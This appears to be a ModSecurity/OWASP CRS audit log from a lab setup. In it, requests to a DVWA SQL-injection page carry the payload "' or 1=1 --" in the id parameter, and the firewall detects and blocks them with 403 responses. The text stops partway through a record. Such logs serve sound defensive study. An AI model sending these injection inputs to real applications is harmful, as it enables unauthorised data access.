{"transaction":{"time":"13/May/2017:12:31:46 --0400","transaction_id":"WRc08n8AAQEAAAkZ0BUAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli_blind/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc08n8AAQEAAAkZ0BUAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":411,"p2":1609,"p3":128,"p4":420,"p5":95,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:50 --0400","transaction_id":"WRc09n8AAQEAAAkZ0BYAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc09n8AAQEAAAkZ0BYAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc09n8AAQEAAAkZ0BYAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc09n8AAQEAAAkZ0BYAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc09n8AAQEAAAkZ0BYAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc09n8AAQEAAAkZ0BYAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":619,"p2":3338,"p3":0,"p4":0,"p5":174,"sr":26,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:53 --0400","transaction_id":"WRc0@X8AAQEAAAkZ0BcAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@X8AAQEAAAkZ0BcAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@X8AAQEAAAkZ0BcAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@X8AAQEAAAkZ0BcAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@X8AAQEAAAkZ0BcAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@X8AAQEAAAkZ0BcAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":414,"p2":2106,"p3":0,"p4":0,"p5":161,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:55 --0400","transaction_id":"WRc0@38AAQEAAAkZ0BgAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=95","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@38AAQEAAAkZ0BgAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@38AAQEAAAkZ0BgAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] 